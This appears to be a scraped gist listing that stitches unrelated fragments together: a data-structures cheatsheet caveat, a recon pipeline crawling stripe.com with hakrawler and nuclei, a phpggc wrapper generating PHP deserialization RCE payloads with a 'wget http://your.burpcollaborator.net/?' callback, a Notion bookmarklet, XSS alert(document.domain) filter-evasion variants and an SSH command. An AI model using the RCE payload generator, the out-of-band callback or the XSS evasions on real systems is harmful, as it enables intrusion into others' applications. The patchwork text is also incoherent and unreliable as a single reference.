Caveat
The tables in this cheatsheet only make sense after you study all thes mentioned data structures and algorithms below.
Do not memorize them, learn how the underlying algorithms work, read the source.
This cheat sheet is just a quick reference to give an broad brush strokes overview of how the most frequently-used data structures and algorithms relate to each other, in terms of time and space complexity.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml | |
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt | |
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt | |
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# phpggc wrapper that automatically generates payloads for RCE gadgets | |
function="system" | |
command="wget http://your.burpcollaborator.net/?" | |
# modify the options below depending on your use case | |
options="-a -b -u -f" | |
# generate gadget chains |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
javascript:(function(){ | |
// Author: Ross Jacobs | |
// Purpose: Use as a browser bookmarklet to bulk delete notion pages in trash | |
// License: Apache 2.0 | |
async function getSpaceId() { | |
resp = await fetch("https://www.notion.so/api/v3/loadUserContent", {"credentials":"include","headers":{"accept":"*/*","cache-control":"no-cache","content-type":"application/json","pragma":"no-cache","sec-fetch-mode":"cors","sec-fetch-site":"same-origin"},"referrerPolicy":"same-origin","body":"{}","method":"POST","mode":"cors"}); | |
json = await resp.json(); | |
spaceId = Object.keys(json.recordMap.space)[0]; | |
return spaceId; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// How many ways can you alert(document.domain)? | |
// Comment with more ways and I'll add them :) | |
// I already know about the JSFuck way, but it's too long to add (: | |
// Direct invocation | |
alert(document.domain); | |
(alert)(document.domain); | |
al\u0065rt(document.domain); | |
al\u{65}rt(document.domain); | |
window['alert'](document.domain); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
csshX --login user --ssh_args '-i /path/to/key.pem' ddd.ddd.ddd.dd1 ddd.ddd.ddd.dd2 |